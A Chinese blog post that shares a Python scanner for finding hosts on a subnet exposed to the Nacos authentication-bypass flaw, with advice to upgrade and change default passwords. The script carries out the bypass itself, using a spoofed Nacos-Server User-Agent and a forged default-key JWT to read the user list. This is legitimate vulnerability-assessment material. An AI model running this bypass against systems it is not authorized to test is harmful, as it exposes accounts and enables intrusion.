基于python的漏洞扫描器

官方确认，低版本的nacos服务管理平台存在多个安全漏洞。这些漏洞可能导致配置文件中的敏感信息泄漏或系统被入侵的风险。

今天浩道跟大家分享一个python脚本，主要用于自动检测某网段内主机上可能存在的nacos漏洞，可以方便大家对某网段内多台主机进行检测，一起看看吧！

如存在漏洞，建议及时升级nacos服务管理平台的版本，并修改默认密码，删除多余管理账号。

nacos.py脚本信息如下，大家可以根据自己实际网段修改对应代码即可。该脚本实现扫描的是192.168.100.0网段内主机上的nacos漏洞。

import requests
import urllib3
import threading
import socket


urllib3.disable_warnings()


# 定义自定义路径和Header
custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2'
header = {
    "User-Agent": "Nacos-Server",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Pragma": "no-cache",
    "Te": "trailers",
    "Cache-Control": "no-cache",
}


# 定义函数，用于发起GET请求并判断回显结果，每次调用这个函数发送一个请求
def send_request(url):
    full_url = url + custom_path  # 拼接完整URL
    try:
        response = requests.get(full_url, headers=header, verify=False, timeout=2)
        if response.status_code == 200 and response.content.find(b"pageNumber") != -1:
            print(f'{url} 存在nacos身份验证绕过漏洞')
        else:
            print(f'{url} 不存在nacos身份验证绕过漏洞')
    except requests.exceptions.RequestException as e:
        print(f'{url} 访问失败 {e}')


# Function to check if port 8848 is open on a given IP address
def is_port_open(ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(2)  # Set a timeout of 2 seconds for the connection attempt
    result = sock.connect_ex((ip, port))
    sock.close()
    return result == 0


# Scan the 192.168.100.1 network segment for hosts with port 8848 open
nacos_hosts = []
for i in range(1, 256):
    ip_address = f'192.168.100.{i}'
    if is_port_open(ip_address, 8848):
        nacos_hosts.append(ip_address)


# Perform Nacos vulnerability check for hosts with port 8848 open
if not nacos_hosts:
    print("No Nacos server found on port 8848 in the 192.168.100.1 network segment.")
else:
    print(f"Found Nacos server(s) on port 8848: {', '.join(nacos_hosts)}")
    threads = []
    for host in nacos_hosts:
        t = threading.Thread(target=send_request, args=(f"http://{host}:8848",))
        threads.append(t)
        t.start()


    # Wait for all threads to complete
    for t in threads:
        t.join()

以下针对三个网段执行脚本，如下图所示：

责任编辑：彭菁